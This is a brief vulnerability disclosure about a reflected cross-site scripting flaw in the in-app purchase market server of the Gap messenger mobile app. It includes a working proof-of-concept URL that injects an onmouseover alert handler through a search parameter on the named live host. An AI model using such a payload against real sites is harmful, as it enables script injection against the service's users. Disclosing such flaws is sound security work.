Gap messenger mobile application has in-app purchase. This function uses "https://market.gapafzar.com" server.
A remote attacker can inject malicious script and exploit both server and client side.
Payload:
https://market.gapafzar.com/page/search_service/academic?q=tt6v8%27onmouseover%3d%27alert(%22Ali%20Abdollahi%22)%27style%3d%27position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%27xkhsl